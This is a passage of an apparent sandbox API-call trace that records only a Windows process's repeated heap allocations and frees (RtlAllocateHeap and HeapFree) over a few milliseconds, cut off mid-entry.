0x3b3c610 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.970] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.970] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.970] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.970] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.970] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.970] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.970] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.970] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.970] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.970] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.970] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.970] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.970] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.970] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.970] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.970] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.970] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.970] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.970] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.970] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.970] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.970] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.970] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.970] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.970] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.970] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.971] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.971] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.971] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.971] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.971] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.971] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.971] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.971] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.971] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.971] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.971] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.971] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.971] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.971] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.972] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.972] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.972] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.972] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.972] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.972] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.972] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.972] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.972] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.972] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.972] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.972] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.972] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.972] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.972] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.972] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.972] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.972] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.972] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.972] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.972] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.972] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.972] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.972] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.972] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.972] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.972] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.973] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.973] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.973] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.973] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.973] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.973] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.973] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.973] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.973] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.973] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.973] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.973] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.973] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.973] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.973] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.974] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.975] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.975] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.975] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.975] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.975] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.975] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.975] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.975] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.975] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.975] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.975] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.975] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.975] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.975] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.975] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 